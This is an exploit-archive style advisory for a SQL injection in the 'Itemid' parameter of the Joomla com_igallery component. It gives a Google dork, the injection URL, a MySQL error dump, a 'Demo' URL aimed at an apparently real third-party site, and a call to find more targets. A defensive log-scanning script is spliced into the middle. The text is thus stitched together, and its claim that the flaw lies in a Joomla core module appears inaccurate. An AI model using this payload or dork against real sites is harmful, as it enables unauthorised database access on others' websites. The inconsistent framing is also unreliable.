###
# Title : Exploit Joomla com_igallery Sql Injection
# Author : Dz MinD Injector
# Home : Algeria 23000 d^_^b
# FaCeb0ok : https://www.facebook.com/Dz.MinD.Injector
# Type : proof of concept
# Tested on : Windows7 & Linux
# Date : 18/01/2016
###
# <?php
# echo " Freedom t0 Palastine " ;
# ?>
# Lov3 Explo8ting Just For Fun !
######## [ Proof / Exploit ] ################|=>
#! Google Dork :
#+ inurl:com_igallery
#########################[!] Description ##################################
This SQL injection can enable an attacker to gain full administrative
access to a target website when combined with other security weaknesses in Joomla!
The SQL injection was discovered in a core module of Joomla!
The "Itemid=" field in c/index.php?option=com_igallery&view=igcategory&id=2&Itemid=' is not properly sanitized, which leads to a SQL injection vulnerability.
A request with a single quote in that field causes the following error:
No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near ') AND axosection='' AND axo=''' at line 6
SQL=SELECT id FROM jos_gmacl WHERE acosection='com_igallery' AND aco='read' AND
arosection='users' AND aro IN () AND axosection='' AND axo=''
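
For defenders, requests like the one described above stand out in web server logs because "Itemid" and "id" stop being plain integers. The following log check is an added example, not part of the original advisory; the log lines are constructed, and the assumption that both parameters are always numeric is taken from the URL shape shown here.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Assumption: both parameters are numeric identifiers, as in the advisory's URL.
INT_PARAMS = ("id", "Itemid")
DIGITS_RE = re.compile(r"[0-9]+")

def suspicious_params(target):
    """Return (name, value) pairs of com_igallery parameters that are not integers."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_igallery" not in query.get("option", []):
        return []  # other components are out of scope for this check
    bad = []
    for name in INT_PARAMS:
        for value in query.get(name, []):  # parse_qs has already URL-decoded the value
            if not DIGITS_RE.fullmatch(value):
                bad.append((name, value))
    return bad

def scan(lines):
    """Return (line_number, parameter, decoded_value) for every flagged request."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            for name, value in suspicious_params(match.group("target")):
                findings.append((lineno, name, value))
    return findings

# Constructed sample log (documentation IP ranges, made-up sizes and times).
SAMPLE_LOG = """\
192.0.2.10 - - [18/Jan/2016:10:00:00 +0000] "GET /index.php?option=com_igallery&view=igcategory&id=2&Itemid=13 HTTP/1.1" 200 5120
198.51.100.7 - - [18/Jan/2016:10:00:05 +0000] "GET /index.php?option=com_igallery&view=igcategory&id=2&Itemid=13%27 HTTP/1.1" 500 812
192.0.2.10 - - [18/Jan/2016:10:00:09 +0000] "GET /index.php?option=com_content&view=article&id=4&Itemid=abc HTTP/1.1" 200 7300
198.51.100.7 - - [18/Jan/2016:10:00:12 +0000] "GET /index.php?option=com_igallery&view=igcategory&id=2&Itemid=' HTTP/1.1" 500 812
""".splitlines()

if __name__ == "__main__":
    for lineno, name, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: non-integer {name}={value!r}")
```

The same integer-only rule is the application-side mitigation: reject or cast "Itemid" to an integer before it reaches the query.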
#########################[!] Proof Of Concept ##################################
http://localhost/path//index.php?option=com_igallery&view=igcategory&id=2&Itemid='[ inject Here ]
##Demo :
http://mytrinityhome.com//index.php?option=com_igallery&view=igcategory&id=2&Itemid=13'
!+ Find More targets in Google ^_^
!+ Greetings to my Friends : Sige-Dz , Sami Joker , Vatou-Dz & All Algerian Hackerz !